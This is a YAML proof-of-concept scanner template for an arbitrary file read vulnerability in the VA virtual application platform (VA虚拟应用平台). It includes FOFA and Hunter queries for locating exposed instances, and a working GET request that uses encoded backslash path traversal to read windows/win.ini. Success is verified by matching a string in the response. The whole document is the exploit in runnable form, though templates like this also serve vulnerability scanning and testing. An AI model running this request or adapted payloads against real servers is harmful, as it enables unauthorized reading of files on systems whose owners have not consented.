product: VA虚拟应用平台
vName: VA虚拟应用平台 任意文件读取
type: 文件读取
vID: [ ]
level: 3
vDesc: 霆智科技的VA虚拟应用平台是一个创新的技术平台，旨在为用户提供虚拟助手（Virtual Assistant）的功能和服务。虚拟助手是一种人工智能系统，通过自然语言处理、机器学习和其他相关技术，能够与用户进行对话，并执行各种任务和服务。
version: ''
note: ''
search:
  FOFA: app="VA-虚拟应用平台"
  Hunter: web.body="EAA益和应用接入系统"
protocol: http
link: https://blog.csdn.net/2301_79099363/article/details/131713861
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - for 16-bit app support
            logic: and